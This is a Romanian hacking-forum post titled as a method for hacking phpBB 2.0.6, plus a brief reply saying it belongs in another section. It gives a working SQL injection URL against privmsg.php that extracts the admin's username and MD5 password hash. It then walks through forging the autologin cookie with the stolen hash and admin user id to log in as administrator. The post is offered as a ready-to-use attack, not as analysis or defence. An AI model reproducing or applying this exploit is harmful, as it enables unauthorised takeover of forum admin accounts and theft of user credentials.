metoda hack phbb 2.0.6

[slashu]

Site :

www.cutare.ro

http://www.cutare.ro/Forum/ Powered by phpBB 2.0.6

Exploit:

privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/*

Dupa Injection vom avea :

Users :

cutarescu / c7c9cfbb7ed7d1cebb7a4442dc30877f <--- ADMIN (vezi mai sus : WHERE user_level=1)

se afla profilul din lista membrilor -> 2

Se creaza un cont nou:

User: xxxx

Pas: yyyy

Se bifeaza optiunea "Remember Me" la logare.Se inchide Firefox fara a da logout !!

Se ia cookie-ul din fisierul cookies.txt (C:Documents and Settings..Application DataMozillaFirefoxProfiles..)

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2296e79218965eb72c92a549dd5a330112%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%225899%22%3B%7D

Dupa aplicarea metodei urldecode() (vezi pe gugal site-uri care decodeaza) vom avea:

phpbb2mysql_data = a:2:{s:11:"autologinid";s:32:"a7c9cfbb7ed7d1cebada4442dc30877d";s:6:"userid";s:4:"5899";}

s:4 se va inlocui cu s:1

5899=id-ul user-ului xxx se va inlocui cu 2

a7c9cfbb7ed7d1cebada4442dc30877d = parola MD5

Editam cookie-ul si inlocuim id-ul si hash-ul aflat prin injection:

phpbb2mysql_data = a:2:{s:11:"autologinid";s:32:"c7c9cfbb7ed7d1cebb7a4442dc30877f";s:6:"userid";s:1:"2";}

Dupa urlencode()(vezi pe gugal site-uri care encodeaza) vom avea:

phpbb2mysql_data = a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22c7c9cfbb7ed7d1cebb7a4442dc30877f%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

Copiem noul cookie in fisierul cookie.txt,deschidem Firefox,intram pe site si ... LASER FRATE

slashu

[Punisher]

nu ai postat unde trebuia... aici e sectiunea 'Tutoriale Video', trebuia sa postezi la sectiunea 'Tutoriale' :@